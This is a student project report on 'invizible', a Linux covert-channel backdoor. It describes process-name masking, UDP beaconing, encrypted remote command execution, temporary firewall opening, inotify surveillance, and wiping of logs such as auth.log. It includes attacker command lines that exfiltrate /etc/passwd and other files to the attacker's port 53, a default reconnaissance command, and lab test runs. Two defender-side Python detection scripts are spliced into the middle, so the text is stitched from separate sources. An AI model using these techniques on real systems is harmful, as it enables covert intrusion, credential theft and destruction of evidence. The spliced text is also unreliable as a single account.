
BCIT Computing and Information Technology
COMP 8505 Special Topics in Network and Security Applications Development
Due Date: June 21, 2011
Author: Arthur (Wesley) Kenzie A00242330
Final Project: Covert Channel Exfiltration (Final Version)
______________________________________________________________________________

This project is a design and implementation of a Linux-based covert channel exfiltration application code-named invizible. The application is presumed to be installed by some means on a remote computer, which is referred to in this report as the compromised machine. It is also presumed that the application is able to be automatically executed, and automatically re-launched upon each and every re-boot of the compromised machine. It is expected to be running substantially all of the time. The primary purpose of the application is to evade detection, and to allow remote control and remote access by an attacker running a copy of the application on a local machine she has physical access to. The attacker will have access to, and control of, a number of features in the application, including the covert exfiltration of any arbitrary file on the compromised machine back to the attacker over the public Internet, or over a private subnet. The application has been made available by the author as an open source project [1] in recognition and in appreciation of the significant open source software it makes use of and builds upon.

1. Introduction
2. Analysis and Methodology
3. Pseudo-code Design
4. Program Defaults and Options
5. Test Results and Examples
6. Known Weaknesses and Recommended Further Work
7. Summary and Conclusions
Appendix
Bibliography
Credits

______________________________________________________________________________ Copyright 2011. Arthur (Wesley) Kenzie. All Rights Reserved. Page 1 of 39

1. Introduction

This project is a design and implementation of a Linux-based covert channel exfiltration application code-named invizible. The application is presumed to be installed by some means on a remote computer, which is referred to in this report as the compromised machine. It is also presumed that the application is able to be automatically executed, and automatically re-launched upon each and every re-boot of the compromised machine. It is expected to be running substantially all of the time. The primary purpose of the application is to evade detection, and to allow remote control and remote access by an attacker running a copy of the application on a local machine. The attacker will have access to a number of related application features, including the covert exfiltration of any arbitrary file on the compromised machine back to the attacker over the public Internet.

In order to evade detection on the compromised machine, the application masks its process name on start-up to match a randomly selected process that is already running at that moment in time. It also removes all command-line parameters from its process list on start-up, does not post to a log file by default, and uses no configuration file so as to keep its footprint as small as possible.

In order to avoid triggering any intrusion detection systems, the application uses only the UDP protocol by default, sends packets to only random or well-used ports, and utilizes no known signatures for its packets.

When the application starts up on the compromised machine, it automatically goes into listening mode, waiting for specially crafted incoming packets to arrive. The composition and design of these packets has been based on the open source fwknop[5] project. By default, the application sniffs for these packets arriving at any random port between 10000 and 65535, and using the UDP[2] protocol. By using the libpcap[3][4] facilities bundled with Linux, this detection of incoming packets by the application occurs separately from any firewall settings on the compromised machine. It also means the application does not require, or use, any open ports on the compromised machine.

Once an incoming packet is detected, it must first be decrypted, then validated against an embedded cryptographic hash, and finally deconstructed to determine its intended purpose. Decryption is required because the packet is encrypted with the Rijndael[6] algorithm using a shared passphrase before it is sent out from the attacker's local machine. A 24- or 25-character passphrase is built into all copies of the application that have the same major version number, but a reset password packet sent at any time from the attacker's local machine can change this default password to anything the attacker wishes. These reset password packets allow the attacker to ensure that no one else can control the compromised machine through the application.

Assuming that an incoming packet has been successfully decrypted, its cryptographic hash is then calculated, and compared to the hash embedded in the packet to ensure the integrity of the packet data. The default cryptographic hash algorithm used for the packets is SHA-256[7].

Deconstruction of the incoming packet after it has been decrypted and its integrity verified allows the compromised machine to learn what it is expected to do, as well as the IP address of the attacker's local machine, the attacker's login name, the timestamp the packet was sent, and a random number intended to reduce exposure to replay attacks[8].

The application's recognized packet types are as follows:

(1) reset password
(2) execute command
(3) open firewall
(4) inotify[9] watch
(5) transfer file
(6) wipe program

Each of these packet types is discussed in more detail below:

(1) The reset password packet embeds a new password that the compromised machine's application is to use for decryption of all subsequent incoming packets. This can be sent multiple times if the attacker wishes to change the password again. If the new password is lost by the attacker, then no further access to the compromised machine would be available until the application is launched again, at which time it would typically reset its password again to its default password.

(2) The execute command packet embeds a command or series of commands to be executed via a system/shell on the compromised machine. If no specific command is specified, the default command sent to the compromised machine is defined to be

    date > /tmp/m; uname -a >> /tmp/m; lsof -nP | grep LISTEN >> /tmp/m; cat /proc/net/arp >> /tmp/m; cat /proc/net/route >> /tmp.m; ifconfig >> /tmp/m; df -T >> /tmp/m

which effectively provides the attacker with a significant amount of information about the compromised machine in a single file /tmp/m.

(3) The open firewall packet embeds instructions to be passed by the application to the firewall that is assumed to be running on the compromised machine. The firewall is assumed to be iptables, and it is assumed that a port/protocol combination that is normally closed to outside access should be opened for a temporary number of seconds before being automatically closed again. If no specific port/protocol/time is specified, the default sent to the compromised machine is for port 22, protocol TCP, to be opened for 15 seconds and then closed again. Within this 15 second interval, the attacker would be able to circumvent the firewall in order to establish a connection to port 22 (which is typically running an ssh service), and so long as that connection was maintained the firewall could be expected to leave it alone, since it would fall into the category of established connections that modern firewalls are typically configured to not interfere with.

(4) The inotify watch packet embeds instructions to be passed by the application to the inotify facility that is assumed to be running on the compromised machine. This requires a Linux version 2.6.25 or greater. If no specific file or directory is specified, the default sent to the compromised machine is for the /var/log directory to be watched for up to 100 file changes or for up to 1 hour, whichever comes first, with all file changes logged to /tmp/i.

(5) The transfer file packet embeds the name of an existing file on the compromised machine to be sent back to the attacker's local machine, and optionally can instruct the compromised machine to erase/wipe the file after the transfer is complete. This file transfer is accomplished by way of 128-byte encrypted packets sent at randomly spaced intervals using the UDP protocol with a destination port 53 on the attacker's local machine. These encrypted packets sent from the compromised machine are constructed in the same manner as packets sent out from the attacker's local machine, other than the specified file's contents are embedded in 128-byte chunks rather than instructions embedded for execution. The attacker's local machine makes use of libpcap to listen on port 53 for these incoming packets - immediately after sending out this packet to the compromised machine - and after decrypting and verifying each packet, writes it to disk in a temporary file /tmp/received. The end of the file transfer is indicated by a final, specially-formatted 128-byte packet and this is followed by one more encrypted packet which contains the size of the file that was just sent.

(6) The wipe program packet instructs the compromised machine to wipe and remove the application program file from disk, as well as the application's standard log file at /var/log/invizible.log and any alternative log file that might be in use. After this the application terminates itself, and can no longer be run.

In case the compromised machine is not reachable from the attacker's local machine, the application is also designed to send out beacon packets at random intervals (between 1 minute and 1 hour) to advertise its presence. On average a beacon packet will be sent out every 29.5 minutes. The beacon packets are normally sent out over UDP to the destination machine's port 53, but can also be sent out over TCP to destination port 80. These beacon packets are encrypted and constructed in the same manner as all other packets, but have the compromised machine's IP address and system information (uname -a) embedded in each of them. No pre-determined IP address is currently hard-coded in the application to identify an attacker's local machine and so these beacon packets are an attempt to assist an attacker in identifying the location of a compromised machine. The beacon packets are only sent out to private and public IP addresses on the same /24 subnet as the compromised machine, which allows the attacker the potential to learn of the compromised machine's existence by getting access to any of the other machines on the same /24 subnet. With access to one of these other machines, the attacker can wait and listen for these beacon packets.

The application developed by the author for this project is available as an open source project at https://launchpad.net/invizible [1] and the various commits made to this project over the last few months clearly document its development.
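The process-name masking described in the introduction can be checked for from the defender's side. The following is an added example, not code from this report or from the invizible project: it assumes the masking rewrites argv[0] while /proc/<pid>/exe still points at the real binary, and it runs over a constructed /proc-like tree whose PIDs and paths are hypothetical.

```python
import os


def _read(path):
    try:
        with open(path, "rb") as fh:
            return fh.read()
    except OSError:
        return b""


def claimed_name(cmdline):
    """Program name a process advertises in argv[0], normalised for comparison."""
    argv0 = cmdline.split(b"\0", 1)[0].decode(errors="replace")
    argv0 = argv0.split(": ", 1)[0]   # daemons that set titles such as "sshd: user@pts/0"
    argv0 = argv0.split(" ", 1)[0]    # argv area rewritten as one space-joined string
    return os.path.basename(argv0.lstrip("-"))  # login shells show up as "-bash"


def inspect(proc_root, pid):
    """Collect the executable path and the advertised name for one PID."""
    base = os.path.join(proc_root, pid)
    try:
        exe = os.readlink(os.path.join(base, "exe"))
    except OSError:
        return None  # kernel thread, exited process, or insufficient privilege
    deleted = exe.endswith(" (deleted)")
    if deleted:
        exe = exe[: -len(" (deleted)")]
    return {
        "exe": exe,
        "exe_name": os.path.basename(exe),
        "deleted": deleted,
        "claimed": claimed_name(_read(os.path.join(base, "cmdline"))),
    }


def scan(proc_root="/proc"):
    """Return {pid: [reasons]} for processes whose advertised name looks borrowed."""
    procs = {}
    for entry in os.listdir(proc_root):
        if entry.isdigit():
            info = inspect(proc_root, entry)
            if info:
                procs[int(entry)] = info
    # PIDs whose executable really carries the name they advertise.
    owners = {}
    for pid, p in procs.items():
        if p["claimed"] == p["exe_name"]:
            owners.setdefault(p["claimed"], []).append(pid)
    findings = {}
    for pid, p in sorted(procs.items()):
        reasons = []
        if p["claimed"] and p["claimed"] != p["exe_name"]:
            reasons.append("argv[0] says %r but executable is %s" % (p["claimed"], p["exe"]))
            if p["claimed"] in owners:
                pids = ", ".join(str(x) for x in sorted(owners[p["claimed"]]))
                reasons.append("name also used by genuine pid(s) " + pids)
        if p["deleted"]:
            reasons.append("executable has been unlinked from disk")
        if reasons:
            findings[pid] = reasons
    return findings


def build_sample_proc(root):
    """Constructed sample: three ordinary processes and one with a borrowed name."""
    samples = {
        "412": ("/usr/sbin/cron", b"/usr/sbin/cron\0-f\0"),
        "977": ("/usr/sbin/sshd", b"sshd: alice@pts/0\0"),
        "1203": ("/bin/bash", b"-bash\0"),
        "2381": ("/tmp/.cache/updater", b"/usr/sbin/cron\0"),  # hypothetical path
    }
    for pid, (exe, cmdline) in samples.items():
        d = os.path.join(root, pid)
        os.makedirs(d)
        os.symlink(exe, os.path.join(d, "exe"))
        with open(os.path.join(d, "cmdline"), "wb") as fh:
            fh.write(cmdline)


if __name__ == "__main__":
    # On a live Linux host this needs root to read every process's exe link.
    for pid, reasons in scan("/proc").items():
        print(pid, "; ".join(reasons))
```

Multi-call binaries such as busybox and programs started through a symlink with a different name will also be reported, so each hit needs a look at the executable path before it is treated as suspicious.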


2. Analysis and Methodology

Starting up the application on the compromised machine can simply be done as follows:

    ./invizible

This puts the application into listening mode, waiting for incoming UDP packets on a random port between 10000 and 65535, expecting the incoming packets to be encrypted with the default password and using the SHA-256 cryptographic hash. The application also masks the process name to something random, sends out beacon messages at random intervals between 1 minute and 1 hour, and does not use a log file. It also makes a single HTTP/TCP connection to http://ippages.com/simple in order to determine its external public-facing IP address, spoofing its user-agent as DirectUpdate/4.6.2 so as to act like a Dynamic DNS updater.

Exfiltration

If the attacker has prior knowledge of the compromised machine's location, and intends to exfiltrate a file from it to her own, she could enter the following on her local machine:

    ./invizible -C -S=123.123.123.123 --pkpass=newpwd42X#
    ./invizible -C -S=123.123.123.123 --pass=newpwd42X# --pktransfer=/etc/passwd

It is assumed that the compromised machine is at IP address 123.123.123.123 in this case. The 1st of these commands resets the password on the compromised machine to newpwd42X#. The 2nd command instructs the compromised machine to begin transferring the /etc/passwd file back to the attacker's local machine, in 128-byte chunks, at random intervals between 3 and 12 seconds, to the attacker's port 53 using UDP. When done, the attacker will have a copy of the /etc/passwd file in /tmp/received.

If this exfiltration attempt is targeted at a compromised machine on the same local subnet as the attacker's local machine, then each of the 2 attacker commands should include a -P option, to ensure that only private IP addresses are used as the destination for packets sent out from the compromised machine, not public IP addresses.

If the attacker's local machine is behind a NAT router/gateway, as most residential machines are, and the compromised machine is accessible over the public Internet, then the NAT router/gateway must be configured to forward incoming port 53 to port 53 on the private IP address of the attacker's local machine in order for the packets sent out from the compromised machine to be received at the attacker's local machine.

If the attacker wishes to erase the file from the compromised machine after it has been sent to the attacker, she could enter the following on her local machine:

    ./invizible -C -S=123.123.123.123 --pass=newpwd42X# --pktransfer=/var/log/syslog,remove

Note, however, that the compromised machine does not receive any confirmation from the attacker's local machine that the exfiltrated file has been received.

If the attacker wishes to have the application wipe itself off the compromised machine after a file has been sent, she could enter the following on her local machine:

    ./invizible -C -S=123.123.123.123 --pass=newpwd42X# \
        --pktransfer=/home/wkenzie/confidential,wipe
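A defender-side check for the transfer and beacon traffic described above, as an added example that is not part of the original report or the invizible code: it flags UDP datagrams to port 53 whose payload does not parse as DNS, then reports repeated runs to one destination and fan-out to neighbours in the sender's /24. The packet tuples, addresses and thresholds are constructed for illustration.

```python
import base64
import hashlib
import ipaddress
import struct
from collections import defaultdict


def looks_like_dns(payload):
    """True if a UDP payload has a plausible DNS header and one well-formed question."""
    if len(payload) < 17:                        # 12-byte header + root name + type/class
        return False
    _id, flags, qdcount, _an, _ns, _ar = struct.unpack("!6H", payload[:12])
    if qdcount != 1 or (flags >> 11) & 0xF > 6:  # one question; opcodes above 6 are unassigned
        return False
    pos = 12
    while pos < len(payload):
        label_len = payload[pos]
        pos += 1
        if label_len == 0:                       # end of QNAME, QTYPE/QCLASS must follow
            return pos - 12 <= 255 and pos + 4 <= len(payload)
        if label_len > 63:                       # not a plain label
            return False
        pos += label_len
    return False                                 # name ran off the end of the datagram


def analyse(packets, min_run=5, min_fanout=8):
    """packets: iterable of (timestamp, src_ip, dst_ip, dst_port, udp_payload)."""
    hits = defaultdict(list)
    for ts, src, dst, dport, payload in packets:
        if dport == 53 and not looks_like_dns(payload):
            hits[(src, dst)].append((ts, len(payload)))
    findings, neighbours = [], defaultdict(set)
    for (src, dst), seen in sorted(hits.items()):
        if ipaddress.ip_address(dst) in ipaddress.ip_network(src + "/24", strict=False):
            neighbours[src].add(dst)
        if len(seen) >= min_run:
            seen.sort()
            gaps = [b[0] - a[0] for a, b in zip(seen, seen[1:])]
            sizes = {size for _, size in seen}
            findings.append({
                "kind": "repeated-non-dns", "src": src, "dst": dst,
                "count": len(seen),
                "fixed_size": sizes.pop() if len(sizes) == 1 else None,
                "min_gap": min(gaps), "max_gap": max(gaps),
            })
    for src, dsts in sorted(neighbours.items()):
        if len(dsts) >= min_fanout:
            findings.append({"kind": "subnet-fanout", "src": src, "neighbours": len(dsts)})
    return findings


# ---- constructed sample traffic (not captured from the application) ----

def dns_query(name, txid=0x1234):
    """Minimal standard query for an A record."""
    header = struct.pack("!6H", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(p)]) + p.encode() for p in name.split(".")) + b"\0"
    return header + qname + struct.pack("!HH", 1, 1)


def opaque_payload(i):
    """128 bytes of base64 text standing in for an encrypted chunk."""
    return base64.b64encode(hashlib.sha256(b"constructed-%d" % i).digest() * 3)


def constructed_capture():
    pkts = []
    # Ordinary resolver traffic from a workstation.
    for t, name in enumerate(["example.com", "example.org", "example.net"]):
        pkts.append((float(t), "10.0.0.20", "10.0.0.1", 53, dns_query(name)))
    # Fixed-size opaque datagrams to one outside host, 3 to 12 seconds apart.
    for i, t in enumerate([100, 104, 113, 120, 131, 136]):
        pkts.append((float(t), "10.0.0.5", "203.0.113.7", 53, opaque_payload(i)))
    # One opaque datagram to each of nine neighbours in the sender's /24.
    for host in (1, 2, 3, 4, 6, 7, 8, 9, 10):
        pkts.append((900.0, "10.0.0.5", "10.0.0.%d" % host, 53, opaque_payload(host)))
    return pkts


if __name__ == "__main__":
    for finding in analyse(constructed_capture()):
        print(finding)
```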

Inotify

If the attacker wishes to monitor and record file changes in a user's home directory on the compromised machine, she could enter the following on her local machine:

    ./invizible -C -S=123.123.123.123 --pkpass=44229!
    ./invizible -C -S=123.123.123.123 --pass=44229! \
        --pkinotify=/home/wkenzie,count=100,expiry=86400,log=/tmp/wkenzie.ilog

This command instructs the compromised machine to initiate an inotify watch on the /home/wkenzie directory and record up to 100 file changes, or up to 1 day's worth of file changes (86400 seconds), to a log file at /tmp/wkenzie.ilog. An automatic transfer of this /tmp/wkenzie.ilog file back to the attacker's local machine would be a useful future enhancement to the application.

The application does currently recognize an echo option as part of the --pkinotify= option, but it has proven to be insufficiently reliable. The echo option initiates an automatic transfer of the inotify log file back to the attacker's local machine over a covert channel by way of DNS lookups/queries bounced off a DNS server with a spoofed source IP address that corresponds to the attacker's local machine IP address. The attacker's local machine is able to receive these bounced packets but re-assembly into a complete file has challenged the author thus far, and so this functionality has not been described in this report.

If the attacker wishes to monitor and record up to 100 file changes, or up to 1 hour's worth of file changes, to the /var/log directory on the compromised machine, she could enter the following on her local machine:

    ./invizible -C -S=123.123.123.123 --pass=44229! --pk=inotify

This would create a log file in /tmp/i that could be subsequently exfiltrated with the following command sent by the attacker 1 hour later:

    ./invizible -C -S=123.123.123.123 --pass=44229! --pktransfer=/tmp/i,remove


Firewall Access

If the attacker wishes to open up a port through the firewall on the compromised machine, she could enter the following on her local machine:

    ./invizible -C -S=123.123.123.123 --pkpass=a%355K
    ./invizible -C -S=123.123.123.123 --pass=a%355K --pkaccess=TCP/22

This command instructs the compromised machine to open up port 22 for incoming TCP connections from the attacker's local machine IP address for the next 15 seconds, after which port 22 is to be closed again. Within 15 seconds of sending this command, the attacker would need to enter the following on her local machine, presuming she has an ssh login account on the compromised machine:

    ssh 123.123.123.123

If the application itself included functionality to operate, for example, as an http or socks proxy, and it allowed access to this functionality through a TCP port such as port 9050, then the attacker could open up this port 9050 on the compromised machine with the following:

    ./invizible -C -S=123.123.123.123 --pass=a%355K --pkaccess=TCP/9050 --pktimeout=30

This would give her 30 seconds to then attempt to connect her browser to this proxy through port 9050 on the compromised machine.

Wipe

If the attacker wishes to delete the application and its log files from the compromised machine, she could enter the following on her local machine:

    ./invizible -C -S=123.123.123.123 --pkpass=YJqr.7
    ./invizible -C -S=123.123.123.123 --pass=YJqr.7 --pkwipe=self/7

This command instructs the compromised machine to wipe (using shred or dd) the application program file and log file with 7 passes of random data before deleting (using unlink) each of them.

If the attacker wishes to erase a particular file from the compromised machine's hard drive, she could enter the following on her local machine:

    ./invizible -C -S=123.123.123.123 --pass=YJqr.7 --pkwipe=/var/log/auth.log


Command Execution

If the attacker wishes to execute an arbitrary command on the compromised machine, she could enter the following on her local machine:

    ./invizible -C -S=123.123.123.123 --pkpass=pIN#3
    ./invizible -C -S=123.123.123.123 --pass=pIN#3 --pkcommand=ls -l /home > /tmp/ls

This command instructs the compromised machine to do a detailed file listing of the /home directory and put this listing in a /tmp/ls file. This file could be subsequently exfiltrated with the following command sent by the attacker a few moments later:

    ./invizible -C -S=123.123.123.123 --pass=pIN#3 --pktransfer=/tmp/ls,remove

Each of the packets sent out by the application, either to the compromised machine, or from the compromised machine, is encoded and encrypted as per the open source fwknop[5] project specification. Each packet is made up of the following, before being RIJNDAEL encrypted with the password being used at that time:

    16 bytes of random data
    Local username
    Local timestamp
    Version number of fwknop specification
    Packet type (access, command, transfer, pass, inotify, wipe, beacon)
    Message content (as appropriate for the packet type)
    SHA256 Digest


3. Pseudo-code Design

main.c main()
    parms.c init_parms() --> abort
    parms.c valparms() --> abort
    main.c run() --> abort
    parms.c cleanup_parms()
    end

main.c run()
    pkclient.c resolve_ip_http_inviz()
    invizible.c doinvizible()
    end

invizible.c doinvizible()
    hping/resolve.c resolve_addr()
    mypcap.c pcap_lookupdevspec() --> return
    libpcap pcap_lookupnet() --> return
    libpcap pcap_open_live() --> return
    libpcap pcap_setdirection()
    libpcap pcap_compile() --> return
    libpcap pcap_setfilter() --> return
    hping/getifname.c get_if_name() --> return
    open raw socket --> return
    hping/resolve.c resolve_addr() --> return
    is attacker and is sending port knocking packet?
        yes:
            construct packet
            calculate hash and add to end of packet
            get password from user if not set
            encrypt packet with password
            pkclient.c send_spa_packet_inviz()
            is sent packet a file transfer request?
                no
                yes: pkserver.c pcap_capture_inviz()
        no:
            re-launch as listener and wait for incoming packets
            pkserver.c pcap_capture_inviz()
            ended with terminate or interrupt?
                no: back to "re-launch as listener and wait for incoming packets"
                yes: end

pkclient.c send_spa_packet_inviz()
    construct ip header and tcp or udp header and tcp or udp data payload
    use sendto() to send packet over raw socket
    end

pkserver.c pcap_capture_inviz()
    set_signal_handlers_inviz()
    set beacon packet alarm() timer
    libpcap pcap_dispatch() --> return
    process_incoming_pkpacket()
    error? -- yes --> back to pcap_dispatch()
    interrupt? -- yes --> back to pcap_dispatch()
    inotify watch initialized? -- yes --> do_inotify_watch()
        no: re-launch as listener and wait for incoming packets
    end

pkserver.c process_incoming_pkpacket()
    preprocess_spa_data_inviz() -- no --> return
    decrypt packet -- no --> return
    get_spa_data_fields_inviz() -- no --> return
    is command packet? -- yes --> execute command --> return
    is reset password packet? -- yes --> reset password --> return
    is file transfer packet? -- yes --> is running on compromised machine?
        yes: send file contents back to attacker (covert channel) --> return
        no: listen for incoming packets and save to disk --> return
    is inotify packet? -- yes --> initialize inotify watch --> return
    is wipe packet? -- yes --> wipe self?
        no: wipe specified file --> return
        yes: wipe application --> die
    is beacon packet? -- yes --> record beacon message --> return
    no: update firewall rules to allow access to specified port and protocol for attacker IP address for specified seconds
    end


4. Program Defaults and Options

Command line options and defaults for the attacker's local machine are as follows:

-C
    required; indicates the client (attacker's) side, as opposed to the server (compromised) side
-S=xyz
    required; indicates IP address xyz of compromised machine to receive packets; compromised machine must be running application on this IP address in order to receive packets
--spoof=xyz
    optional; indicates spoofed source IP address of packet sent to compromised machine
--pkallow=xyz
    optional; indicates allowed IP address inserted into firewall access packet sent to compromised machine; specified if an IP address other than the attacker's local machine should be allowed access to the compromised machine
--external=xyz
    optional; indicates external public IP address of attacker's local machine that must be passed to compromised machine in firewall access packet; if xyz=auto then it is automatically determined
--ua=xxxx
    optional; defaults to DirectUpdate/4.6.2; specifies user-agent string to use when automatically determining external IP address
--testing
    optional; default is no testing; specify if packets are not to be sent to compromised machine
--pksave=xxxx
    optional; no default; specify file name if a copy of packets is to be saved to file xxxx on attacker's local machine
--pwd=xxxx
    optional; no default; also recognized as --pass= or --password=; indicates password used for encryption of outgoing packets and decryption of incoming packets; if not supplied then user is prompted to enter it at run-time; must match password used on compromised machine
--srcport=n
    optional; defaults to 0 which indicates it will be a random unprivileged source port number on outgoing packets; can be used to specify a particular source port number
--pkport=n
    optional; defaults to --pkport=random; can specify any privileged or unprivileged port number (--pkport=n) or range of port numbers (--pkport=m-n); must be the same on both attacker's local machine and compromised machine; this is essentially the backdoor port(s) on the compromised machine
--pkaccess=xxxx/n
    optional; if sending access request packet to compromised machine, this is the protocol and port number to be opened on the firewall
--pk=1
    optional; same as --pkaccess=tcp/22 or --pk=access
--pktimeout=n
    optional; defaults to 15; indicates how many seconds to leave the pkaccess firewall port open before closing it again; can be specified from 1 to 3600

______________________________________________________________________________ Copyright 2011. Arthur (Wesley) Kenzie. All Rights Reserved. Page 14 of 39

--pkdigest=n
    optional; defaults to 3 which is SHA256; specifies digest method to use in port knocking packet construction and de-construction; 0 is MD5; 1 is SHA1; 2 is SHA128; 4 is SHA384; 5 is SHA512
--pkcommand=xxxx
    optional; if sending remote execution command packet, this is the remote command to be executed on the compromised machine
--pk=2
    optional; same as --pkcommand="date > /tmp/m; uname -a >> /tmp/m; lsof -nP | grep LISTEN >> /tmp/m; cat /proc/net/arp >> /tmp/m; cat /proc/net/route >> /tmp.m; ifconfig >> /tmp/m; df -T >> /tmp/m" or --pk=command
--pktransfer=xxxx
    optional; if sending file transfer packet, this is the name of the xxxx file on the compromised machine to be transferred back to the attacker's local machine
--pk=3
    optional; same as --pk=transfer
--pkinotify=xxxx
    optional; if sending inotify packet, this is the xxxx directory or filename to be watched on the compromised machine
--pk=4
    optional; same as --pkinotify=watch=/var/log,log=/tmp/i or --pk=inotify
--pkwipe=xxxx/n
    optional; if sending wipe packet, this is the xxxx filename to be wiped with n passes on the compromised machine
--pk=6
    optional; same as --pkwipe=self/7 or --pk=wipe
--pkpass=xxxx
    optional; if sending reset password packet, this is the new xxxx password to be used until it is reset again or until the application restarts
--pk=7
    optional; same as --pk=pass
--pkprivate
    optional; if sending port knocking packet to compromised machine on same local, private subnet, then specify this to send private IP address to compromised machine rather than public external IP address
-P
    optional; same as --pkprivate

Command line options and defaults applicable to both the compromised machine and the attacker's local machine are as follows:

--verbose
    to indicate additional detailed messages are to be displayed
-V
    same as --verbose
-Q
    to indicate quiet mode with little or no messages displayed
--ipv4=n
    defaults to 1; to specify not using IPv4 set to 0
--udp=n
    defaults to 1; to specify not using UDP set to 0
--tcp=n
    defaults to 0; to specify using TCP set to 1; not fully tested at this time
--raw=n
    defaults to 1; to specify not using raw sockets set to 0
--if=xxx
    defaults to --if=any which is automatic determination of interface device; if a specific interface is required then identify it here
--psmask=xxxx
    defaults to --psmask=random; can specify any string up to 16 characters long to be used to mask the running instance of the application

--pmode
    optional; default is to do packet sniffing not in promiscuous mode; specify if promiscuous mode sniffing is to be done
--pcapbuff=n
    optional; default is 1500 byte size for pcap sniffing buffer size; specify between 1 and 10240 if 1500 is not suitable
--pcaptimeout=n
    optional; default is -1 meaning that pcap sniffing does not automatically timeout while waiting; specify between -1 and 86400 seconds if timeout required

Command line options and defaults for the compromised machine are as follows:

--pk=n
    optional; default is --pk=any; specifies the type of port knocking to listen for; see list of recognized --pk= options for attacker's local machine
--firewallexe=xxxx
    optional; defaults to --firewallexe=/sbin/iptables; can specify any other firewall executable as required
--fwoutput
    optional; default is to enable firewall OUTPUT access
--fwforwarding
    optional; default is to enable firewall FORWARDING access
--fwsnat
    optional; default is to disable firewall SNAT access; specify if SNAT should be enabled
--pwd=xxxx
    optional; no default; also recognized as --pass= or --password=; indicates password used for decryption of incoming packets and encryption of outgoing packets; has built-in default value, and can be changed by incoming reset password packets from attacker's local machine
--pkport=n
    optional; defaults to --pkport=random; can specify any privileged or unprivileged port number (--pkport=n) or range of port numbers (--pkport=m-n); must be the same on both attacker's local machine and compromised machine; this is essentially the backdoor port(s) on the compromised machine


5. Test Results and Examples

An exfiltration test run was done on June 21, 2011 as follows. This shows a reset password packet being sent from the attacker's local machine at 192.168.0.193 to the compromised machine at 192.168.0.199. The new password is indicated as newpwd42X#. Note that tcpdump is running at the same time, recording activity on the eth0 interface into a file attacker1.pcap. On the compromised machine, tcpdump is also running, and recording activity into a corresponding file victim1.pcap. Note that the application process is number 18503, and is masked as [kswapd0]. Note that the -L option is specified, indicating that all displayed activity is recorded to the /var/log/invizible.log file. After sending this reset password packet, the application re-launches into listening mode, but this is manually interrupted with Ctrl-C by the author, and then a file transfer message is sent to the compromised machine, as shown below at 10:39:42.423755.

The screen snapshot below shows the file transfer request for the /etc/passwd file from the compromised machine. The application re-launches into listening mode and then receives this file, in multiple incoming packets from the compromised machine at 192.168.0.199, starting at 10:39:43.137400. Each new packet arrives at a random interval between 3 and 12 seconds apart, which is the default behaviour for the application.

The screen snapshot below shows completion of the incoming file transfer to /tmp/received at 10:41:33.14551 and confirmation of successful receipt of the entire 1943 byte file at 10:41:33.15255.

The screen snapshot below shows the initial portion of the received /etc/passwd file from the compromised machine to /tmp/received on the attacker's local machine.

The screen snapshot below shows a directory listing of the /tmp directory on the attacker's local machine, confirming the file size and date/time stamp of the /tmp/received file exfiltrated from the compromised machine. It also shows the moving of the /tmp/received file to the etc_passwd.exfil file which is included on the accompanying DVD. The /var/log/invizible.log file is also moved to the attacker1.log file, which is also included on the accompanying DVD.

The screen snapshot below shows a portion of the contents of the tcpdump capture file attacker1.pcap. Packet 26 is the reset password message sent to the compromised machine.

The screen snapshot below shows packet 36 sent to the compromised machine as the file transfer message.

The screen snapshot below shows packet 37 as the first of several packets arriving from the compromised machine, destined to port 53 on the attacker's local machine using the UDP protocol.

The screen snapshot below from the attacker1.pcap file shows the last packet arriving from the compromised machine with the exfiltrated file contents in packet 92. Starting in packet 93 the attacker's local machine is seen to be starting a session with one.ubuntu.com to do an automatic update check sequence.

The screen snapshot below shows a portion of the contents of the tcpdump capture file victim1.pcap. Packet 18 is the reset password message arriving from the attacker's machine at 192.168.0.193.

The screen snapshot below shows packet 28 arriving at the compromised machine from the attacker's machine with the file transfer request. The source and destination ports for all the packets shown here match exactly those contained in the attacker1.pcap file shown previously.

Another exfiltration test run was done on June 21, 2011 at 12:3:40.411253 as follows. This shows a reset password packet being sent from the attacker's local machine at 192.168.0.193 to the compromised machine at 192.168.0.199. The new password is indicated as what4. Tcpdump was set to run at the same time, recording activity on the eth0 interface into a file attacker2.pcap. On the compromised machine, tcpdump is also running, and recording activity into a corresponding file victim2.pcap. Note that the application process in this test is number 19398, and is masked as [migration/1] (with a spurious letter C showing after this). Note that the -L option is again specified, indicating that all displayed activity is recorded to the /var/log/invizible.log file. After sending this reset password packet, the application re-launches into listening mode, but this is manually interrupted with Ctrl-C by the author, and then a command execution message "ls -l /home > /tmp/ls" is sent to the compromised machine, as shown below at 12:4:27.571436.

The screen snapshot below shows the application on the attacker's local machine being shut down after sending the command execution message, and then a file transfer message is sent for /tmp/ls along with instructions to remove this file when its transfer is complete, and have the application on the compromised machine wipe itself when done as well. No further communication would be possible with the compromised machine after such a message packet is sent from the attacker.

The screen snapshot below shows the file transfer message being sent to the compromised machine at 192.168.0.199, followed by incoming packets with the contents of the requested file. The file transfer is completed to /tmp/received at 12:5:11.736649 and verification of the expected file size of 320 bytes is shown below at 12:5:11.736966.

The screen snapshot below shows the contents of the exfiltrated file received to /tmp/received and the move of this file to the home_ls.exfil file which is included on the accompanying DVD. The log file for all this activity is also shown below as moved to attacker2.log, which is also included on the accompanying DVD.

The screen snapshot below is from the compromised machine, showing startup of the application, a successful reset of the password at 12:3:31.863068, a successful transfer of the /tmp/ls file at 12:5:3.92083 and the wiping of the application so it can no longer be run. The /tmp/ls file was also deleted in this case, but evidence of this fact was unfortunately not captured. The tcpdump file victim2.pcap is also shown being created below, with 142 captured packets. The following page shows this victim2.pcap file in Wireshark.

The screen snapshot below shows the victim2.pcap file from the compromised machine. Packet 96 is the last packet sent to the attacker with information about exfiltration of the /tmp/ls file. This victim2.pcap file is included on the accompanying DVD.

6. Known Weaknesses and Recommended Future Work

The primary weakness of this project's application is the direct communication between the compromised machine and the attacker's local machine. An adversary observing the packets exchanged between the two machines would be able to learn the IP address of each endpoint. The UDP protocol chosen, the random port numbers used, the avoidance of open sockets, the random spacing of packets, and the encryption of each packet are good design choices to minimize detection by observers. However, an improved design would be to include one or more intermediary machines that transferred packets to and from the compromised machine, and to and from the attacker's local machine. Enabling the application to recognize a new "forward this" message, and ensuring there are multiple compromised machines to accomplish this, is recommended by the author.

Future enhancements are also recommended to enable an additional "reset option" message packet that works in a similar fashion to the reset password message. Any of the various options could be dynamically changed by the attacker to better suit her needs or limitations. Changing back and forth between UDP and TCP is one example of this; changing packet intervals is another; sending occasional fake packets intermixed with real packets is another.

7. Summary and Conclusions

